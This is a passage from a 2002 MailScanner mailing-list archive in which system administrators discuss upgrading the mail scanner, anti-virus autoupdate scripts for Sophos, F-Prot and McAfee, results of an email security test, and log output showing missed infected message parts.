Field" To: Sent: Tuesday, September 24, 2002 4:47 PM Subject: Re: Email Vulnerabilities > At 05:54 24/09/2002, you wrote: > >Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I have > >found out is the speed, its more faster now > > Yay! Someone noticed the optimisations I did in 3.22-something in the way > of re-ordering all the "if" statements to reduce the number of system calls > by 50%. > :-) > > >One thing I am wondering with, why does this eicar.com gfi test email goes > >to my outlook express deleted items with a modified subject {VIRUS?} > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and > >the attachment is intact with the filename eicar.com. im just wondering > >about this. > > Can anyone else corroborate this? V3 should have deleted the entire message > in each of those cases. > > >Also, I am using Sophos and I got this message in my console "Useful life of > >SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > You need to entirely replace Sophos once every 2 to 3 months, as that is > how long they provide IDE files for any given version of Sophos. > > Download the .tar.Z from the website, stick it in /tmp then do > cd /tmp > /usr/local/MailScanner/bin/Sophos.install > > *Please* don't try and use Sophos's install script, it makes a bit of a > mess of things :( > > >----- Original Message ----- > >From: "Glynn S. Condez" > >To: > >Sent: Tuesday, September 24, 2002 10:37 AM > >Subject: Re: Email Vulnerabilities > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that I need > > > to reconfigure except for the conf files of mailscanner. > > > > > > > > > --- Glynn --- > > > > > > ----- Original Message ----- > > > From: "Jeff A. Earickson" > > > To: > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > Hi, > > > > I set up my mailscanner directory thus: > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> bin-3.23-1/ > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> etc-3.23-1/ > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] > > > > and bin-[version]. Then I do side-by-side comparisons of the default > > > > config versus my setup. When I've carried my config changes into the > > > > new etc files, I stop mailscanner, change the symlinks, restart > > > > mailscanner. Virtually no down time. It would be nice if this > > > > kind of directory versioning was incorporated into the tarfiles > > > > for v4 somehow... > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: 207-872-3659 > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > jaearick@colby.edu > > > > ** Colby College, 4214 Mayflower Hill, FAX: 207-872-3076 > > > > ** Waterville ME, 04901-8842 > > > > > > -------------------------------------------------------------------------- > > > -- > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > From: Glynn S. Condez > > > > > Reply-To: MailScanner mailing list > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > > mailscanner, is it possible if I am going to rename the old > >mailscanner > > > > > directory and install the new version of mailscanner as mailscanner? > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > Thanks > > > > > --- Glynn --- > > > > > > > > > > ----- Original Message ----- > > > > > From: "Glynn S. Condez" > > > > > To: > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well I'll > >do > > > the > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > thanks > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > From: "Mike Kercher" > > > > > > To: > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all of > >the > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > From: MailScanner mailing list > >[mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > Behalf Of Glynn S. Condez > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, some > > > of > > > > > the > > > > > > > test email that contents a test virus or codes goes through and > >the > > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or > >code? > > > by > > > > > > the > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From P.G.M.Peters at civ.utwente.nl Tue Sep 24 11:55:02 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:45 2006 Subject: Users' Comments Book In-Reply-To: <5.1.0.14.2.20020923232215.024d1cd8@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020923232215.024d1cd8@imap.ecs.soton.ac.uk> Message-ID: On Mon, 23 Sep 2002 23:28:30 +0100, you wrote: >Aw shucks... >I don't sleep too much, I know that, but I admit I do have 4 PC's in my >office running all day :-) > >By the way, I only do MailScanner in between everything else I do at work. >I work as part of a team of 8, supporting a department of 1500 people (half >undergraduates, half research students and staff). If you want to see what >I do all day, read this: >http://www.ecs.soton.ac.uk/~jkf/myjob.html To bad I won't have time for a detour from my drive from Harwich to Fishguard next friday. And the same goes for my drive back from Holyhead in October. I would love to see how you do manage that. But perhaps on my next holiday I'll go to the south of England. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From P.G.M.Peters at civ.utwente.nl Tue Sep 24 11:58:17 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:45 2006 Subject: Spam Header Problem In-Reply-To: <56913.194.151.195.222.1032849079.squirrel@mail.vanramselaar.nl> References: <53801.194.151.195.222.1032848767.squirrel@mail.vanramselaar.nl> <56913.194.151.195.222.1032849079.squirrel@mail.vanramselaar.nl> Message-ID: On Tue, 24 Sep 2002 08:31:19 +0200, you wrote: >>> I've been playing with version 3-23.1 and have run into a small >>> problem with the spam header. I turned off spam checking but then get >>> a blank spam header ie "X-MailScanner-SpamCheck:" no matter what I do. >> >> Now that you mention it... same here. > >Sorry, I should tell the truth... ;p >I had only looked at the headers of Gerry's messages, which already had >the X-MailScanner-SpamCheck header in it. >My configuration does not add that header. So it's NOT the same here... That's why I have changed the header to reflect our domain. And the test-system also has another header. Sometimes e-mail get through more systems and I wanted to now which one acted on the message. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From mailscanner at ecs.soton.ac.uk Tue Sep 24 12:25:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <028601c263b3$9f99d570$8201a8c0@proaccessph.com> References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924122541.06aa7a40@imap.ecs.soton.ac.uk> At 11:17 24/09/2002, you wrote: > > >One thing I am wondering with, why does this eicar.com gfi test email >goes > > >to my outlook express deleted items with a modified subject {VIRUS?} > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and > > >the attachment is intact with the filename eicar.com. im just wondering > > >about this. > > > > Can anyone else corroborate this? V3 should have deleted the entire >message > > in each of those cases. > >Is there anything that I need to recheck or reconfigure in the >mailscanner.conf? No, there aren't any options to do with the partial message trap, it's always on. >--- Glynn --- >----- Original Message ----- >From: "Julian Field" >To: >Sent: Tuesday, September 24, 2002 4:47 PM >Subject: Re: Email Vulnerabilities > > > > At 05:54 24/09/2002, you wrote: > > >Hi guys, I just updated my mailscanner from 3.22-7 to 3.23-1 and what I >have > > >found out is the speed, its more faster now > > > > Yay! Someone noticed the optimisations I did in 3.22-something in the way > > of re-ordering all the "if" statements to reduce the number of system >calls > > by 50%. > > :-) > > > > >One thing I am wondering with, why does this eicar.com gfi test email >goes > > >to my outlook express deleted items with a modified subject {VIRUS?} > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and > > >the attachment is intact with the filename eicar.com. im just wondering > > >about this. > > > > Can anyone else corroborate this? V3 should have deleted the entire >message > > in each of those cases. > > > > >Also, I am using Sophos and I got this message in my console "Useful life >of > > >SWEEP has beed exceeded" does the Sophos doesn't work anymore? > > > > You need to entirely replace Sophos once every 2 to 3 months, as that is > > how long they provide IDE files for any given version of Sophos. > > > > Download the .tar.Z from the website, stick it in /tmp then do > > cd /tmp > > /usr/local/MailScanner/bin/Sophos.install > > > > *Please* don't try and use Sophos's install script, it makes a bit of a > > mess of things :( > > > > >----- Original Message ----- > > >From: "Glynn S. Condez" > > >To: > > >Sent: Tuesday, September 24, 2002 10:37 AM > > >Subject: Re: Email Vulnerabilities > > > > > > > > > > Thanks Jeff for the great idea, it seems that there's nothing that I >need > > > > to reconfigure except for the conf files of mailscanner. > > > > > > > > > > > > --- Glynn --- > > > > > > > > ----- Original Message ----- > > > > From: "Jeff A. Earickson" > > > > To: > > > > Sent: Tuesday, September 24, 2002 10:28 AM > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > Hi, > > > > > I set up my mailscanner directory thus: > > > > > > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 bin -> >bin-3.23-1/ > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:23 bin-3.22-14/ > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:46 bin-3.23-1/ > > > > > lrwxrwxrwx 1 root daemon 10 Sep 23 14:01 etc -> >etc-3.23-1/ > > > > > drwxr-xr-x 2 root none 1024 Sep 13 10:29 etc-3.22-14/ > > > > > drwxr-xr-x 2 root none 1024 Sep 23 13:55 etc-3.23-1/ > > > > > drwxr-xr-x 3 root none 512 May 2 11:52 man/ > > > > > drwxr-xr-x 8 jaearick jaearick 512 Sep 23 14:06 src/ > > > > > drwx------ 4 root none 512 May 3 09:38 var/ > > > > > > > > > > When a new version of mailscanner comes out, I untar it and move the > > > > > mailscanner/etc and mailscanner/bin directories to etc-[version] > > > > > and bin-[version]. Then I do side-by-side comparisons of the >default > > > > > config versus my setup. When I've carried my config changes into >the > > > > > new etc files, I stop mailscanner, change the symlinks, restart > > > > > mailscanner. Virtually no down time. It would be nice if this > > > > > kind of directory versioning was incorporated into the tarfiles > > > > > for v4 somehow... > > > > > > > > > > ** Jeff A. Earickson, Ph.D PHONE: >207-872-3659 > > > > > ** Senior UNIX Sysadmin, Information Technology EMAIL: > > > > jaearick@colby.edu > > > > > ** Colby College, 4214 Mayflower Hill, FAX: >207-872-3076 > > > > > ** Waterville ME, 04901-8842 > > > > > > > > > -------------------------------------------------------------------------- > > > > -- > > > > > > > > > > On Tue, 24 Sep 2002, Glynn S. Condez wrote: > > > > > > > > > > > Date: Tue, 24 Sep 2002 10:18:03 +0800 > > > > > > From: Glynn S. Condez > > > > > > Reply-To: MailScanner mailing list > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > oh by the way, this the first time that I am going to upgrade the > > > > > > mailscanner, is it possible if I am going to rename the old > > >mailscanner > > > > > > directory and install the new version of mailscanner as >mailscanner? > > > > > > > > > > > > or is there anything that I need to be reconfigure? > > > > > > > > > > > > Thanks > > > > > > --- Glynn --- > > > > > > > > > > > > ----- Original Message ----- > > > > > > From: "Glynn S. Condez" > > > > > > To: > > > > > > Sent: Tuesday, September 24, 2002 10:02 AM > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > This mailing list is great, the response is so fast :) well >I'll > > >do > > > > the > > > > > > > upgrade, email you guys about the results. > > > > > > > > > > > > > > thanks > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > ----- Original Message ----- > > > > > > > From: "Mike Kercher" > > > > > > > To: > > > > > > > Sent: Tuesday, September 24, 2002 10:05 AM > > > > > > > Subject: Re: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > Try upgrading to 3.22-15 I think Julian got it to detect all >of > > >the > > > > > > > vulnerabilities. > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > > > > > > > From: MailScanner mailing list > > >[mailto:MAILSCANNER@JISCMAIL.AC.UK]On > > > > > > > > Behalf Of Glynn S. Condez > > > > > > > > Sent: Monday, September 23, 2002 8:58 PM > > > > > > > > To: MAILSCANNER@JISCMAIL.AC.UK > > > > > > > > Subject: Email Vulnerabilities > > > > > > > > > > > > > > > > > > > > > > > > Based on these website http://www.gfi.com/emailsecuritytest, >some > > > > of > > > > > > the > > > > > > > > test email that contents a test virus or codes goes through >and > > >the > > > > > > > > mailscanner doesn't detect the embedded scripts in the emails. > > > > > > > > > > > > > > > > In version 4, is it possible to scan these kinds of viruses or > > >code? > > > > by > > > > > > > the > > > > > > > > way I'm using the stable version of mailscanner 3-22.7 with > > > > > > > > spamassassin2-31. > > > > > > > > > > > > > > > > > > > > > > > > --- Glynn --- > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From lbergman at abi.tconline.net Tue Sep 24 13:31:13 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:45 2006 Subject: F-Prot Autoupdate In-Reply-To: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> Message-ID: <200209240731.13672.lbergman@abi.tconline.net> > Is this script working for other people? works for me too. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From hciss at HCIWS.COM Tue Sep 24 14:55:26 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:45 2006 Subject: F-Prot Autoupdate References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> Message-ID: <002701c263d2$0c400780$6701a8c0@matthew> Updated F-prot to latest version and also updated Mailscanner to latest 3.x release. Now it works. Is there anyway to copy it into the cron.daily directory? Being a perl script it likely won't work like that? Matt > >Using the perl update script for F-prot provided by MailScanner I always > >get: "Unknown fatal error calling "checksum", exiting., Bad file descriptor > >at autoupdate line 294, chunk 2.". > > What directory do you have f-prot installed in? > What directory contains the "checksum" f-prot program? > What happens when you do "ldd checksum" (once you've found the right > directory)? > > Is this script working for other people? From jim at ENTROPHY-FREE.NET Tue Sep 24 15:48:19 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:45 2006 Subject: F-Prot Autoupdate In-Reply-To: <002701c263d2$0c400780$6701a8c0@matthew> References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> <002701c263d2$0c400780$6701a8c0@matthew> Message-ID: <1032878900.2141.1.camel@wilowisp.dynetics.com> On Tue, 2002-09-24 at 08:55, Matt wrote: > Updated F-prot to latest version and also updated Mailscanner to latest 3.x > release. Now it works. Is there anyway to copy it into the cron.daily > directory? Being a perl script it likely won't work like that? > Perl scripts work fine in cron. You could invoke the script from cron.daily or do so from root's crontab (cron -e). -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From jaearick at COLBY.EDU Tue Sep 24 15:59:57 2002 From: jaearick at COLBY.EDU (Jeff A. Earickson) Date: Thu Jan 12 21:15:45 2006 Subject: version 4 and perl 5.8? Message-ID: Julian, Will version 4 be "certified" to run/work with perl 5.8? --- Jeff Earickson From andersan at LTKALMAR.SE Tue Sep 24 16:22:12 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:45 2006 Subject: SV: SV: Fix in uvscan/autoupdate Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB4F@lkl22.ltkalmar.se> I did the patch but I still get the msg from line 57 - Mcafee update failed: cannot find the the update file, at ./autoupdate line 93 - I cant really read perl enough to understand whats wrong but if anyone got an update file that work pls send it to me so I can try From mailscanner at ecs.soton.ac.uk Tue Sep 24 17:10:44 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: version 4 and perl 5.8? In-Reply-To: Message-ID: <5.1.0.14.2.20020924171033.06911c70@imap.ecs.soton.ac.uk> At 15:59 24/09/2002, you wrote: >Julian, > > Will version 4 be "certified" to run/work with perl 5.8? Yes, once I get around to installing perl 5.8 :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 17:10:07 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: F-Prot Autoupdate In-Reply-To: <002701c263d2$0c400780$6701a8c0@matthew> References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924170947.068f5df8@imap.ecs.soton.ac.uk> At 14:55 24/09/2002, you wrote: >Updated F-prot to latest version and also updated Mailscanner to latest 3.x >release. Now it works. Is there anyway to copy it into the cron.daily >directory? Being a perl script it likely won't work like that? Take a look at the cron.daily sophos.autoupdate script and you'll see how to do it. >Matt > > > >Using the perl update script for F-prot provided by MailScanner I always > > >get: "Unknown fatal error calling "checksum", exiting., Bad file >descriptor > > >at autoupdate line 294, chunk 2.". > > > > What directory do you have f-prot installed in? > > What directory contains the "checksum" f-prot program? > > What happens when you do "ldd checksum" (once you've found the right > > directory)? > > > > Is this script working for other people? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 17:13:16 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: SV: SV: Fix in uvscan/autoupdate In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB4F@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020924171132.06bdd088@imap.ecs.soton.ac.uk> At 16:22 24/09/2002, you wrote: >I did the patch but I still get the msg from line 57 >- >Mcafee update failed: cannot find the the update file, at ./autoupdate line >93 That error sounds like the ftp site timing out. The US site is horribly slow, the Europe site is much faster. Right near the top of the script there are 2 lines like this: #my($ftpsite) = 'ftpeur.nai.com'; # Use faster European mirror instead of my($ftpsite) = 'ftp.nai.com'; # busy US site Move the # from the start of 1 line to the start of the other line and you'll be using the European mirror site at ftpeur.nai.com. Then try re-running it and you will probably find it works now. This seems to have been a problem for a few days now. >- >I cant really read perl enough to understand whats wrong but if anyone >got an update file that work pls send it to me so I can try > From my point of view I can only find 2 reasons for failure >- missing some perl part like Net::FTP but then I think the script > would bail out earlier? >- something is wrong with paths in the script, my installation of mcafee >is in /usr/local/uvscan? > >I tried with f-prot and it works fine. So I thought maybe my comp >was stupid so I did a try on another comp. There it starts without >a bailout but it doesnt finish and no lookfile is writen to /tmp >Any good or bad advice for me to try because Im lost. > >/Anders > > > -----Ursprungligt meddelande----- > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Skickat: den 23 september 2002 23:58 > > Till: MAILSCANNER@JISCMAIL.AC.UK > > ?mne: Re: SV: Fix in uvscan/autoupdate > > > > > > At 17:59 23/09/2002, you wrote: > > >As the bad perl knowledge I got I need to ask where these > > >lines are supposed to be in the script? > > > > Around line 66 as it says at the start of the patch. > > > > > > >/Anders > > > > > > > -----Ursprungligt meddelande----- > > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > > Skickat: den 23 september 2002 18:11 > > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > > ?mne: Fix in uvscan/autoupdate > > > > > > > > > > > > There appears to have been a change in the syntax of the > > McAfee uvscan > > > > program, which means that the "autoupdate" script for it will > > > > bail out with > > > > a "no target specified for scanning" error. > > > > > > > > To fix this, just apply this tiny change to uvscan/autoupdate (or > > > > lib/mcafee-autoupdate in V4). > > > > > > > > --- autoupdate.old Mon Sep 23 11:01:01 2002 > > > > +++ autoupdate Mon Sep 23 11:11:31 2002 > > > > @@ -66,7 +66,7 @@ > > > > # to see if the new dat's are o.k attempt to run mcafee > > > > with them and > > > > # check for errors > > > > print STDERR "About to run mcafee\n"; > > > > -open(MCAFEETEST, "$mcafee -d $mcafeeroot | "); > > > > +open(MCAFEETEST, "$mcafee -d $mcafeeroot . | "); > > > > print STDERR "Running mcafee\n"; > > > > while(){ > > > > chomp; > > > > -- > > > > Julian Field Teaching Systems Manager > > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > > Computer Science > > > > Tel. 023 8059 2817 University of Southampton > > > > Southampton SO17 1BJ > > > > > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Tue Sep 24 17:20:32 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:45 2006 Subject: 3.23-1 swearing like a pirate... In-Reply-To: <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> Message-ID: <0209241820320D.09429@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday 24 September 2002 11:06, Julian Field wrote: > At 03:12 24/09/2002, you wrote: > >Julian, > > I upgraded from 3.22-14 to 3.23-1 this afternoon and my syslog file > >looks a wee bit more profane than before. I'm getting a lot of "oh shit" > >complaints, eg: > > # Now to actually do something about it... > > Can you try sending yourself one and confirm whether MailScanner has > actually disabled the Microsoft-specific exploit or not. I can't get it to > go wrong on my system :-( > I too have some swearing in the log file. It seems that when the antivirus finds a virus in a message suffering from a Microsoft-specific exploit (in these days, Klez), the message is triggered. I also noticed that in these cases the infected file, that used to linger in the quarantine directory, is cancelled. My quarantine directories are now almost empty, just containing the 'message' files, besides a few exceptions for non-Klez viri. Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kJDQtgCCNnfQWWkRAm7/AJ9XH3j4qylEZaaAFEdK4Ip03BWVnACfVRTM eUjJ4XKoep7RsUY7aXIkuZs= =aQiX -----END PGP SIGNATURE----- From mailscanner-news at WIJDOGEN.DHS.ORG Tue Sep 24 17:31:20 2002 From: mailscanner-news at WIJDOGEN.DHS.ORG (Jeroen) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924122541.06aa7a40@imap.ecs.soton.ac.uk> Message-ID: <024401c263e7$d0ab2ef0$0101a8c0@jeroen> Hello, > > >One thing I am wondering with, why does this eicar.com gfi test email goes > > >to my outlook express deleted items with a modified subject {VIRUS?} > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body and > > >the attachment is intact with the filename eicar.com. im just wondering > > >about this. > > > > Can anyone else corroborate this? V3 should have deleted the entire > > message in each of those cases. I have the same, I upgraded also from the rpm to version: mailscanner-3.23-1 When i put debugging on 1 and restart mailsccanner, mailscanner stops after " In Debugging mode, not forking...". Is this normal ? When i run the :http://www.gfi.com/emailsecuritytest/ test and mailscanner in debug mode i see this message in the logs, watch the Oh shit messages !: [root@mail etc]# cat /var/log/maillog |grep g8OEwF113849 Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific exploits in g8OEwF113849 Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 977,g8OEwI113962,g8OEwF113814 Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in message :-( g8OEwF113849 Sep 24 17:00:36 mail mailscanner[14094]: Saved entire message to /var/spool/MailScanner/quarantine/20020924/g8OEwF113849 Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific exploits in g8OEwF113849 Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in message :-( g8OEwF113849 Sep 24 17:05:30 mail mailscanner[15462]: Saved entire message to /var/spool/MailScanner/quarantine/20020924/g8OEwF113849 Sep 24 17:05:34 mail sendmail[15711]: g8OEwF113849: to=jeroen, delay=00:07:18, xdelay=00:00:00, mailer=local, pri=132087, dsn=2.0.0, stat=Sent Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages g8OEwD113772,g8OEwE113798,g8OEwF113849 [root@mail etc]# cat /var/log/maillog |grep g8OEwE113798 Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific exploits in g8OEwE113798 Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 977,g8OEwI113962,g8OEwF113814 Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in message :-( g8OEwE113798 Sep 24 17:00:35 mail mailscanner[14094]: Saved entire message to /var/spool/MailScanner/quarantine/20020924/g8OEwE113798 Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific exploits in g8OEwE113798 Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in message :-( g8OEwE113798 Sep 24 17:05:29 mail mailscanner[15462]: Saved entire message to /var/spool/MailScanner/quarantine/20020924/g8OEwE113798 Sep 24 17:05:33 mail sendmail[15711]: g8OEwE113798: to=jeroen, delay=00:07:19, xdelay=00:00:00, mailer=local, pri=130691, dsn=2.0.0, stat=Sent Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages g8OEwD113772,g8OEwE113798,g8OEwF113849 [root@mail etc]# Maybe this info is usefull to tackle the splitting message thing. Regards, Jeroen From sevans at FOUNDATION.SDSU.EDU Tue Sep 24 17:32:10 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:45 2006 Subject: Second speed test Message-ID: <6214C3F9233D764C9E7029396C3550153314E2@mail.foundation.sdsu.edu> He's taken Version 4 from 3.2 times faster to 4.0 times faster. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Sunday, September 22, 2002 1:09 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Second speed test I have fixed a couple of bugs today, and it's now even faster. Same hardware as before, same configuration, same dataset. 4.00.0a3 processed 20,000 messages in 104.6 minutes. This scales up to 275,334 messages per day. So 4.00.0a3 ran 4.0 times fast than 